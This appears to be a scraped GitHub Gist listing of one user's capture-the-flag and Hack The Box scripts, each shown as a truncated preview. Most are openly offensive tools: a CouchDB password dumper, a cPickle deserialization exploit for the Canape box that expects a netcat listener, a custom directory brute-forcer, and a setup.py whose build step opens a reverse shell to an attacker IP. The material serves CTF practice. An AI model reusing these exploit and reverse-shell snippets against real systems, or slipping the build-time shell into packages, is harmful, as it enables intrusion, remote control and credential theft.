Ge0rg3
/ Clicker-PartB.py
Created
September 29, 2018 23:30
Written for my CSAW Red 2018 Clicker Write-up
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def purchase(clicker): | |
| global authorization | |
| data={'name':clicker} | |
| req = rq.post("http://web.chal.csaw.io:10106/clicker/purchase", headers=authorization, json=data) | |
| if req.json()['status'] == "success": | |
| return "Success!" | |
| else: | |
| return "Error." |
Ge0rg3
/ Clicker-PartA.py
Last active
October 8, 2018 09:58
Written for my CSAW Red 2018 Clicker Write-up
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests as rq | |
| url = "http://web.chal.csaw.io:10106/" | |
| def register(userpass): | |
| if len(userpass) < 8: | |
| return "Please enter at least 8 characters." | |
| details = { | |
| "username":userpass, | |
| "password":userpass, | |
| } |
Ge0rg3
/ Word-Descrambler.py
Created
September 23, 2018 16:04
Part of the Reply Challenge 2018 Practice Challenges.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import hashlib | |
| descrambled = [] | |
| concword = "" | |
| with open('scrambled-words.txt','r') as f: | |
| scrambledwords = f.read().split() | |
| with open('dictionary.txt','r') as f: | |
| dictionary = f.read().split() |
Ge0rg3
/ AES-Bruteforce-Last-Bit.html
Created
September 23, 2018 13:02
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/sha256.js"></script> | |
| <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script> | |
| <script> | |
| function hex2a(hex) { | |
| var str = ''; | |
| for (var i = 0; i < hex.length; i += 2) | |
| str += String.fromCharCode(parseInt(hex.substr(i, 2), 16)); | |
| return str; | |
| } |
Ge0rg3
/ Js4u7h.html
Last active
October 8, 2018 09:58
Part of the Reply Challenge 2018 Practice Challenges.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script> | |
| function auth() { | |
| var k = CryptoJS.SHA256("\x93\x39\x02\x49\x83\x02\x82\xf3\x23\xf8\xd3\x13\x##"); // ops...missing last byte! | |
| var u = document.getElementById("user").value; | |
| var p = document.getElementById("pass").value; | |
| var t = false; | |
| if(u == "\x68\x34\x63\x6b\x33\x72") { | |
| var enc = CryptoJS.AES.encrypt(p, CryptoJS.enc.Hex.parse(k.toString().substring(0,32)), { iv: CryptoJS.enc.Hex.parse(k.toString().substring(32,64)) }); | |
| if(enc == "PKhuCrfh3RUw4vie3OMa8z4kcww1i7198ly0Q4rpuyA=") { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from distutils.command.build_py import build_py as _build_py | |
| from distutils.command.build_py import build_py as _build_py | |
| from distutils.core import setup | |
| import socket, subprocess, os | |
| class build_py(_build_py): | |
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| s.connect(("10.10.15.xxx",1339)) | |
| os.dup2(s.fileno(),0) | |
| os.dup2(s.fileno(),1) |
Ge0rg3
/ CouchDB_User_Parser.py
Created
September 14, 2018 22:04
Used for grabbing usernames/passwords from a CouchDB database.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ###Retrieves passwords for Canape CouchDB Users | |
| import requests as rq | |
| url = "http://george:george@localhost:5984/passwords/" | |
| alldocs = rq.get(url+"_all_docs").json() | |
| for i in alldocs["rows"]: | |
| entry_id = str(i["id"]) | |
| ret = rq.get(url+entry_id).json() |
Ge0rg3
/ CanapeExploit.py
Created
September 14, 2018 21:47
A Python cPickle deserialization exploit for the Canape box on Hack The Box.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ###Canape cPickle Exploit (run nc -nlvp 1338 separately.) | |
| #Change host/port to your own ip/desired port. | |
| LHOST = "10.10.15.xxx" | |
| LPORT = "1338" | |
| import requests as rq #For posting request | |
| import cPickle #For generating payload | |
| import hashlib #For generating MD5 hash as id | |
| import os #For creating shell object |
Ge0rg3
/ CanapeDirb.py
Created
September 14, 2018 21:03
A custom version of Dirb for the Canape box on the Hack The Box platform.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ###Custom Dirb Script for Canape | |
| import requests as rq | |
| import sys | |
| url = "http://10.10.10.70/" | |
| homepage = "Welcome to the future home page" | |
| wordlist = "common" | |
| found = [] |
Ge0rg3
/ EscapeMe.py
Created
August 19, 2018 23:44
A script for checking a list of programs against those on https://gtfobins.github.io
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| #Usage: "python EscapeMe.py filename", where filename is a file containing a list of binaries. | |
| import requests as rq | |
| from bs4 import BeautifulSoup | |
| import sys | |
| resp = rq.get("https://gtfobins.github.io/").text | |
| soup = BeautifulSoup(resp, 'html.parser') |